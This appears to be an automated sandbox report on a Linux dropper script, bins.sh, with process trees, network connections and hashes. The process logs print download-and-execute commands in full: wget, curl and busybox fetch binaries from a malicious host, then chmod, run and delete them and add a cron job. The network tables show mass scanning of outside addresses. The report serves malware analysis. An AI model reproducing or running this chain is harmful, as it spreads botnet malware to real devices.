Analysis Overview
SHA256
c4ffcebc0d441088029827d34c8dea73194328becf29e50825d908b5b2f5d661
Threat Level: Shows suspicious behavior
The file bins.sh was found to be: Shows suspicious behavior.
Malicious Activity Summary
Executes dropped EXE
Renames itself
File and Directory Permissions Modification
Creates/modifies Cron job
Enumerates running processes
Checks CPU configuration
Writes file to tmp directory
Reads runtime system information
System Network Configuration Discovery
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-12-05 07:52
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-12-05 07:52
Reported
2024-12-05 07:54
Platform
ubuntu1804-amd64-20240611-en
Max time kernel
149s
Max time network
131s
Command Line
Signatures
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
Processes
/tmp/bins.sh
[/tmp/bins.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/zZM090BtLw96clc18K3325Bi3InWJUorwB]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/zZM090BtLw96clc18K3325Bi3InWJUorwB]
Network
| Country | Destination | Domain | Proto |
| N/A | 224.0.0.251:5353 | | udp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| GB | 185.125.188.62:443 | | tcp |
| GB | 185.125.188.62:443 | | tcp |
| US | 151.101.1.91:443 | | tcp |
| US | 151.101.1.91:443 | | tcp |
| GB | 195.181.164.14:443 | | tcp |
Files
Analysis: behavioral2
Detonation Overview
Submitted
2024-12-05 07:52
Reported
2024-12-05 07:54
Platform
debian9-armhf-20240611-en
Max time kernel
150s
Max time network
153s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB | /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB | N/A |
Renames itself
| Description | Indicator | Process | Target |
| N/A | N/A | /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB | N/A |
Creates/modifies Cron job
| Description | Indicator | Process | Target |
| File opened for modification | /var/spool/cron/crontabs/tmp.nFADI4 | /usr/bin/crontab | N/A |
Enumerates running processes
Checks CPU configuration
| Description | Indicator | Process | Target |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/265/cmdline | /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB | N/A |
| File opened for reading | /proc/692/cmdline | /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB | N/A |
| File opened for reading | /proc/699/cmdline | /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB | N/A |
| File opened for reading | /proc/716/cmdline | /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB | N/A |
| File opened for reading | /proc/789/cmdline | /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB | N/A |
| File opened for reading | /proc/824/cmdline | /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB | N/A |
| File opened for reading | /proc/12/cmdline | /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB | N/A |
| File opened for reading | /proc/27/cmdline | /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB | N/A |
| File opened for reading | /proc/783/cmdline | /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB | N/A |
| File opened for reading | /proc/835/cmdline | /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB | N/A |
| File opened for reading | /proc/902/cmdline | /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB | N/A |
| File opened for reading | /proc/17/cmdline | /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB | N/A |
| File opened for reading | /proc/645/cmdline | /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB | N/A |
| File opened for reading | /proc/702/cmdline | /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB | N/A |
| File opened for reading | /proc/780/cmdline | /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB | N/A |
| File opened for reading | /proc/25/cmdline | /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB | N/A |
| File opened for reading | /proc/650/cmdline | /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB | N/A |
| File opened for reading | /proc/844/cmdline | /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB | N/A |
| File opened for reading | /proc/862/cmdline | /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB | N/A |
| File opened for reading | /proc/863/cmdline | /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB | N/A |
| File opened for reading | /proc/891/cmdline | /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB | N/A |
| File opened for reading | /proc/710/cmdline | /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB | N/A |
| File opened for reading | /proc/792/cmdline | /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB | N/A |
| File opened for reading | /proc/867/cmdline | /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB | N/A |
| File opened for reading | /proc/290/cmdline | /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB | N/A |
| File opened for reading | /proc/451/cmdline | /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB | N/A |
| File opened for reading | /proc/802/cmdline | /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB | N/A |
| File opened for reading | /proc/871/cmdline | /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB | N/A |
| File opened for reading | /proc/882/cmdline | /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/1/cmdline | /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB | N/A |
| File opened for reading | /proc/812/cmdline | /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB | N/A |
| File opened for reading | /proc/872/cmdline | /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB | N/A |
| File opened for reading | /proc/724/cmdline | /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB | N/A |
| File opened for reading | /proc/786/cmdline | /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB | N/A |
| File opened for reading | /proc/738/cmdline | /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB | N/A |
| File opened for reading | /proc/781/cmdline | /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB | N/A |
| File opened for reading | /proc/813/cmdline | /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB | N/A |
| File opened for reading | /proc/877/cmdline | /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB | N/A |
| File opened for reading | /proc/886/cmdline | /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB | N/A |
| File opened for reading | /proc/887/cmdline | /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB | N/A |
| File opened for reading | /proc/893/cmdline | /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/731/cmdline | /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB | N/A |
| File opened for reading | /proc/906/cmdline | /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB | N/A |
| File opened for reading | /proc/720/cmdline | /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB | N/A |
| File opened for reading | /proc/745/cmdline | /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB | N/A |
| File opened for reading | /proc/330/cmdline | /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB | N/A |
| File opened for reading | /proc/840/cmdline | /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB | N/A |
| File opened for reading | /proc/744/cmdline | /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB | N/A |
| File opened for reading | /proc/787/cmdline | /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB | N/A |
| File opened for reading | /proc/810/cmdline | /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB | N/A |
| File opened for reading | /proc/859/cmdline | /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB | N/A |
| File opened for reading | /proc/402/cmdline | /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB | N/A |
| File opened for reading | /proc/717/cmdline | /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB | N/A |
| File opened for reading | /proc/14/cmdline | /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB | N/A |
| File opened for reading | /proc/726/cmdline | /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB | N/A |
| File opened for reading | /proc/260/cmdline | /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB | N/A |
| File opened for reading | /proc/774/cmdline | /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB | N/A |
| File opened for reading | /proc/861/cmdline | /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB | N/A |
| File opened for reading | /proc/794/cmdline | /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB | N/A |
| File opened for reading | /proc/836/cmdline | /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB | N/A |
| File opened for reading | /proc/23/cmdline | /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB | N/A |
| File opened for reading | /proc/740/cmdline | /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB | /usr/bin/curl | N/A |
Processes
/tmp/bins.sh
[/tmp/bins.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/zZM090BtLw96clc18K3325Bi3InWJUorwB]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/zZM090BtLw96clc18K3325Bi3InWJUorwB]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/zZM090BtLw96clc18K3325Bi3InWJUorwB]
/bin/chmod
[chmod 777 zZM090BtLw96clc18K3325Bi3InWJUorwB]
/tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB
[./zZM090BtLw96clc18K3325Bi3InWJUorwB]
/bin/sh
[sh -c crontab -l]
/usr/bin/crontab
[crontab -l]
/bin/sh
[sh -c crontab -]
/usr/bin/crontab
[crontab -]
/bin/rm
[rm zZM090BtLw96clc18K3325Bi3InWJUorwB]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/ywFFVVO9FFFiqIhnp3CjuvxoRt2eOTpwUG]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/ywFFVVO9FFFiqIhnp3CjuvxoRt2eOTpwUG]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/ywFFVVO9FFFiqIhnp3CjuvxoRt2eOTpwUG]
/bin/chmod
[chmod 777 ywFFVVO9FFFiqIhnp3CjuvxoRt2eOTpwUG]
/tmp/ywFFVVO9FFFiqIhnp3CjuvxoRt2eOTpwUG
[./ywFFVVO9FFFiqIhnp3CjuvxoRt2eOTpwUG]
/bin/rm
[rm ywFFVVO9FFFiqIhnp3CjuvxoRt2eOTpwUG]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/OhFbeFlNh48rnwYnWPke5hjvy6aMpgW5c9]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/OhFbeFlNh48rnwYnWPke5hjvy6aMpgW5c9]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/OhFbeFlNh48rnwYnWPke5hjvy6aMpgW5c9]
/bin/chmod
[chmod 777 OhFbeFlNh48rnwYnWPke5hjvy6aMpgW5c9]
/tmp/OhFbeFlNh48rnwYnWPke5hjvy6aMpgW5c9
[./OhFbeFlNh48rnwYnWPke5hjvy6aMpgW5c9]
/bin/rm
[rm OhFbeFlNh48rnwYnWPke5hjvy6aMpgW5c9]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/Bu9yglR9x0Y5e2jBKPnji9UncVsXgThItX]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/Bu9yglR9x0Y5e2jBKPnji9UncVsXgThItX]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/Bu9yglR9x0Y5e2jBKPnji9UncVsXgThItX]
/bin/chmod
[chmod 777 Bu9yglR9x0Y5e2jBKPnji9UncVsXgThItX]
/tmp/Bu9yglR9x0Y5e2jBKPnji9UncVsXgThItX
[./Bu9yglR9x0Y5e2jBKPnji9UncVsXgThItX]
/bin/rm
[rm Bu9yglR9x0Y5e2jBKPnji9UncVsXgThItX]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/Vn4qxsEXqKf1c64htQMLQ9ZX7wNO6HrNTS]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/Vn4qxsEXqKf1c64htQMLQ9ZX7wNO6HrNTS]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/Vn4qxsEXqKf1c64htQMLQ9ZX7wNO6HrNTS]
/bin/chmod
[chmod 777 Vn4qxsEXqKf1c64htQMLQ9ZX7wNO6HrNTS]
/tmp/Vn4qxsEXqKf1c64htQMLQ9ZX7wNO6HrNTS
[./Vn4qxsEXqKf1c64htQMLQ9ZX7wNO6HrNTS]
/bin/rm
[rm Vn4qxsEXqKf1c64htQMLQ9ZX7wNO6HrNTS]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/jycs76M6vBIZ1GmDmLy0gXM9o11CS79Z9O]
Network
| Country | Destination | Domain | Proto |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:443 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:443 | conn.masjesu.zip | tcp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| CN | 121.32.165.48:49152 | tcp | |
| US | 68.165.156.81:49152 | tcp | |
| NL | 213.126.53.108:49152 | tcp | |
| FR | 62.68.65.208:49152 | tcp | |
| US | 70.183.110.242:49152 | tcp | |
| US | 44.112.254.128:49152 | tcp | |
| US | 96.149.194.215:49152 | tcp | |
| CN | 27.14.109.151:49152 | tcp | |
| FR | 85.222.202.82:49152 | tcp | |
| GB | 109.180.133.68:49152 | tcp | |
| US | 168.229.122.63:49152 | tcp | |
| CN | 14.148.116.187:49152 | tcp | |
| US | 69.79.129.120:49152 | tcp | |
| US | 35.63.29.147:49152 | tcp | |
| US | 165.236.214.216:49152 | tcp | |
| CL | 191.117.233.63:49152 | tcp | |
| CN | 221.202.254.42:49152 | tcp | |
| US | 174.174.175.234:49152 | tcp | |
| JP | 126.76.48.179:8443 | tcp | |
| NL | 145.210.134.181:5555 | tcp | |
| CN | 123.197.194.234:49152 | tcp | |
| RU | 176.107.250.169:49152 | tcp | |
| US | 169.228.15.150:49152 | tcp | |
| US | 167.16.222.76:49152 | tcp | |
| RU | 178.155.12.58:49152 | tcp | |
| US | 162.102.138.228:49152 | tcp | |
| US | 75.137.123.129:49152 | tcp | |
| US | 208.189.30.14:49152 | tcp | |
| HK | 156.225.167.158:49152 | tcp | |
| TW | 120.104.147.95:49152 | tcp | |
| BR | 200.205.230.214:49152 | tcp | |
| US | 3.82.152.41:8443 | tcp | |
| CN | 221.11.176.194:49152 | tcp | |
| TW | 180.218.146.162:49152 | tcp | |
| US | 54.25.27.65:49152 | tcp | |
| US | 68.91.202.150:49152 | tcp | |
| ID | 39.230.241.27:49152 | tcp | |
| CN | 222.26.210.56:49152 | tcp | |
| US | 76.52.64.217:49152 | tcp | |
| US | 169.130.91.95:49152 | tcp | |
| US | 12.153.80.135:49152 | tcp | |
| US | 8.80.179.141:49152 | tcp | |
| EG | 45.105.207.10:49152 | tcp | |
| US | 17.247.199.124:49152 | tcp | |
| US | 69.142.119.224:49152 | tcp | |
| US | 32.102.69.60:49152 | tcp | |
| US | 184.117.24.190:49152 | tcp | |
| AU | 203.1.240.63:49152 | tcp | |
| IT | 80.19.154.252:49152 | tcp | |
| KR | 211.168.77.245:49152 | tcp | |
| US | 206.203.220.17:49152 | tcp | |
| CN | 1.82.128.50:49152 | tcp | |
| US | 66.102.216.222:49152 | tcp | |
| CN | 42.102.62.228:49152 | tcp | |
| US | 69.1.2.158:49152 | tcp | |
| US | 18.3.191.68:49152 | tcp | |
| KR | 122.35.186.55:49152 | tcp | |
| US | 3.152.75.174:49152 | tcp | |
| US | 157.223.143.141:49152 | tcp | |
| US | 157.96.246.215:49152 | tcp | |
| CN | 123.59.84.221:49152 | tcp | |
| KW | 212.43.17.7:49152 | tcp | |
| ID | 36.79.170.74:49152 | tcp | |
| SG | 43.78.129.16:49152 | tcp | |
| AT | 156.58.155.150:49152 | tcp | |
| AU | 103.192.175.157:49152 | tcp | |
| US | 57.125.252.42:49152 | tcp | |
| US | 50.115.118.1:49152 | tcp | |
| US | 72.67.189.181:49152 | tcp | |
| US | 54.53.211.6:49152 | tcp | |
| CA | 142.82.93.247:49152 | tcp | |
| DK | 2.105.79.16:7574 | tcp | |
| US | 18.7.155.165:52869 | tcp | |
| IN | 171.59.82.186:37215 | tcp | |
| US | 70.89.206.61:8443 | tcp | |
| US | 17.10.187.166:8443 | tcp | |
| US | 64.65.229.66:8443 | tcp | |
| DE | 79.193.48.79:8443 | tcp | |
| BR | 177.18.194.254:8443 | tcp | |
| CN | 121.32.165.48:8443 | tcp | |
| US | 40.123.110.153:8443 | tcp | |
| NL | 213.126.53.108:8443 | tcp | |
| US | 68.165.156.81:8443 | tcp | |
| FR | 62.68.65.208:8443 | tcp | |
| US | 70.183.110.242:8443 | tcp | |
| CN | 14.148.116.187:8443 | tcp | |
| US | 35.63.29.147:8443 | tcp | |
| US | 69.79.129.120:8443 | tcp | |
| CL | 191.117.233.63:8443 | tcp | |
| US | 168.229.122.63:8443 | tcp | |
| FR | 85.222.202.82:8443 | tcp | |
| GB | 109.180.133.68:8443 | tcp | |
| US | 174.174.175.234:8443 | tcp | |
| US | 44.112.254.128:8443 | tcp | |
| CN | 27.14.109.151:8443 | tcp | |
| US | 165.236.214.216:8443 | tcp | |
| CN | 221.202.254.42:8443 | tcp | |
| US | 96.149.194.215:8443 | tcp | |
| US | 3.152.75.174:8443 | tcp | |
| CN | 123.197.194.234:8443 | tcp | |
| US | 169.228.15.150:8443 | tcp | |
| US | 76.52.64.217:8443 | tcp | |
| HK | 156.225.167.158:8443 | tcp | |
| US | 17.247.199.124:8443 | tcp | |
| US | 66.102.216.222:8443 | tcp | |
| US | 68.91.202.150:8443 | tcp | |
| AU | 203.1.240.63:8443 | tcp | |
| US | 18.3.191.68:8443 | tcp | |
| CN | 42.102.62.228:8443 | tcp | |
| RU | 178.155.12.58:8443 | tcp | |
| KR | 211.168.77.245:8443 | tcp | |
| BR | 200.205.230.214:8443 | tcp | |
| CN | 221.11.176.194:8443 | tcp | |
| US | 8.80.179.141:8443 | tcp | |
| CN | 222.26.210.56:8443 | tcp | |
| US | 167.16.222.76:8443 | tcp | |
| US | 184.117.24.190:8443 | tcp | |
| TW | 180.218.146.162:8443 | tcp | |
| US | 75.137.123.129:8443 | tcp | |
| KR | 122.35.186.55:8443 | tcp | |
| US | 208.189.30.14:8443 | tcp | |
| EG | 45.105.207.10:8443 | tcp | |
| US | 12.153.80.135:8443 | tcp | |
| CN | 1.82.128.50:8443 | tcp | |
| US | 162.102.138.228:8443 | tcp | |
| US | 69.1.2.158:8443 | tcp | |
| US | 69.142.119.224:8443 | tcp | |
| ID | 39.230.241.27:8443 | tcp | |
| US | 54.25.27.65:8443 | tcp | |
| NL | 145.210.134.181:49152 | tcp | |
| TW | 120.104.147.95:8443 | tcp | |
| US | 206.203.220.17:8443 | tcp | |
| US | 169.130.91.95:8443 | tcp | |
| US | 32.102.69.60:8443 | tcp | |
| US | 157.96.246.215:8443 | tcp | |
| US | 157.223.143.141:8443 | tcp | |
| RU | 176.107.250.169:8443 | tcp | |
| US | 57.125.252.42:8443 | tcp | |
| US | 72.215.250.178:37215 | tcp | |
| CN | 123.59.84.221:8443 | tcp | |
| US | 72.67.189.181:8443 | tcp | |
| ID | 36.79.170.74:8443 | tcp | |
| KR | 222.106.219.249:37215 | tcp | |
| US | 50.115.118.1:8443 | tcp | |
| SG | 43.78.129.16:8443 | tcp | |
| US | 54.53.211.6:8443 | tcp | |
| CA | 142.82.93.247:8443 | tcp | |
| KW | 212.43.17.7:8443 | tcp | |
| AT | 156.58.155.150:8443 | tcp | |
| AU | 103.192.175.157:8443 | tcp | |
| IT | 80.19.154.252:8443 | tcp | |
| DK | 2.105.79.16:5555 | tcp | |
| US | 18.7.155.165:7574 | tcp | |
| IN | 171.59.82.186:80 | tcp | |
| US | 108.122.217.15:37215 | tcp | |
| US | 161.6.151.73:37215 | tcp | |
| CH | 81.6.43.148:37215 | tcp | |
| US | 99.149.244.54:37215 | tcp | |
| US | 167.65.125.127:37215 | tcp | |
| IT | 5.98.119.62:37215 | tcp | |
| US | 19.191.169.151:37215 | tcp | |
| IT | 80.17.7.142:37215 | tcp | |
| JP | 36.12.152.179:37215 | tcp | |
| US | 15.97.191.187:37215 | tcp | |
| US | 35.85.168.78:37215 | tcp | |
| US | 108.122.217.15:80 | tcp | |
| AU | 101.164.220.178:37215 | tcp | |
| US | 97.74.148.73:37215 | tcp | |
| FR | 84.4.186.110:37215 | tcp | |
| FR | 79.91.200.213:37215 | tcp | |
| CN | 116.185.191.243:37215 | tcp | |
| KR | 221.141.222.201:37215 | tcp | |
| JP | 202.230.92.131:37215 | tcp | |
| US | 216.251.2.225:37215 | tcp | |
| GB | 195.99.7.153:37215 | tcp | |
| US | 151.119.189.144:37215 | tcp | |
| US | 44.136.35.34:37215 | tcp | |
| US | 157.215.158.220:37215 | tcp | |
| BR | 177.21.255.107:37215 | tcp | |
| US | 216.142.35.195:37215 | tcp | |
| US | 34.25.76.42:37215 | tcp | |
| US | 56.38.254.229:37215 | tcp | |
| CN | 111.35.191.236:37215 | tcp | |
| IT | 91.252.166.232:37215 | tcp | |
| KR | 211.172.79.180:37215 | tcp | |
| FR | 86.227.112.28:37215 | tcp | |
| US | 50.50.24.234:37215 | tcp | |
| KR | 202.20.176.124:37215 | tcp | |
| AU | 202.171.188.226:37215 | tcp | |
| AR | 181.8.238.90:37215 | tcp | |
| US | 48.214.185.167:37215 | tcp | |
| CN | 36.163.107.19:37215 | tcp | |
| US | 171.147.37.179:37215 | tcp | |
| US | 56.165.237.179:37215 | tcp | |
| US | 16.193.190.63:37215 | tcp | |
| US | 209.203.128.250:37215 | tcp | |
| US | 207.157.33.75:37215 | tcp | |
| IT | 62.196.30.19:37215 | tcp | |
| AE | 109.177.135.130:37215 | tcp | |
| KR | 222.106.219.249:80 | tcp | |
| US | 72.215.250.178:80 | tcp | |
| US | 169.93.187.199:37215 | tcp | |
| US | 75.35.37.107:37215 | tcp | |
| US | 9.251.180.91:37215 | tcp | |
| ZA | 41.181.35.41:37215 | tcp | |
| CN | 106.88.211.254:37215 | tcp | |
| FR | 90.32.220.230:37215 | tcp | |
| PH | 58.69.24.171:37215 | tcp | |
| CN | 117.133.109.118:37215 | tcp | |
| KR | 61.102.237.159:37215 | tcp | |
| CN | 110.97.243.82:37215 | tcp | |
| BR | 201.45.84.96:37215 | tcp | |
| US | 66.60.198.143:37215 | tcp | |
| CA | 173.34.247.236:37215 | tcp | |
| RO | 80.96.93.112:37215 | tcp | |
| CN | 111.25.25.49:37215 | tcp | |
| US | 9.171.43.74:37215 | tcp | |
| BR | 177.73.67.174:37215 | tcp | |
| ES | 194.106.18.151:37215 | tcp | |
| US | 170.23.110.239:37215 | tcp | |
| GB | 90.244.65.167:37215 | tcp | |
| US | 73.129.146.179:37215 | tcp | |
| MX | 201.172.165.165:37215 | tcp | |
| US | 16.90.226.20:37215 | tcp | |
| DK | 2.105.79.16:49152 | tcp | |
| US | 168.3.149.174:37215 | tcp | |
| NL | 145.210.134.181:8443 | tcp | |
| US | 48.73.202.179:37215 | tcp | |
| CN | 119.6.213.144:37215 | tcp | |
| CN | 157.156.177.163:37215 | tcp | |
| CZ | 90.180.75.74:37215 | tcp | |
| CN | 182.111.26.56:37215 | tcp | |
| US | 166.45.87.196:37215 | tcp | |
| US | 18.7.155.165:5555 | tcp | |
| IN | 171.59.82.186:81 | tcp | |
| US | 35.85.168.78:80 | tcp | |
| IT | 80.17.7.142:80 | tcp | |
| US | 161.6.151.73:80 | tcp | |
| JP | 36.12.152.179:80 | tcp | |
| US | 99.149.244.54:80 | tcp | |
| US | 15.97.191.187:80 | tcp | |
| US | 19.191.169.151:80 | tcp | |
| IT | 5.98.119.62:80 | tcp | |
| CH | 81.6.43.148:80 | tcp | |
| US | 167.65.125.127:80 | tcp | |
| US | 108.122.217.15:81 | tcp | |
| US | 168.3.149.174:80 | tcp |
Files
/tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB
| MD5 | 786d75a158fe731feca3880f436082c0 |
| SHA1 | 79ea2734e43d00cdeabed5586b2c1994d02aef3e |
| SHA256 | 5fb5b9beb44997a6d1baf950a8bf05b94aa59406d82ba2fea27eb13c497d4b18 |
| SHA512 | 7984ebc874563267570f828ee158e4860971e184900e3590ac3b4829285443e065dd1ad4df190ceabf575880a4cd8ead4dd1132e9c1650239accf3f6440a3f7f |
/var/spool/cron/crontabs/tmp.nFADI4
| MD5 | 5e8eb0b39864e53b859bcdcaeb4dbe6a |
| SHA1 | c8116483ad132a21e500bb5087c53996ed66334c |
| SHA256 | 6f0768d965338cb7d3061fcc41810df84bd23d8978a6e186fe996b33e6ae37e7 |
| SHA512 | 4338d28aba1567ee8022a74e0d80020daaeea88b4d026c36fbb9e395e7e9d4a511073e94a018afe1863248585fe7f413d09ccff177f6b41c24ff829d746a0820 |
Analysis: behavioral3
Detonation Overview
Submitted
2024-12-05 07:52
Reported
2024-12-05 07:54
Platform
debian9-mipsbe-20240611-en
Max time kernel
139s
Max time network
151s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB | /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB | /usr/bin/wget | N/A |
| File opened for modification | /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB | /usr/bin/curl | N/A |
Processes
/tmp/bins.sh
[/tmp/bins.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/zZM090BtLw96clc18K3325Bi3InWJUorwB]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/zZM090BtLw96clc18K3325Bi3InWJUorwB]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/zZM090BtLw96clc18K3325Bi3InWJUorwB]
/bin/chmod
[chmod 777 zZM090BtLw96clc18K3325Bi3InWJUorwB]
/tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB
[./zZM090BtLw96clc18K3325Bi3InWJUorwB]
/bin/rm
[rm zZM090BtLw96clc18K3325Bi3InWJUorwB]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/ywFFVVO9FFFiqIhnp3CjuvxoRt2eOTpwUG]
Network
| Country | Destination | Domain | Proto |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
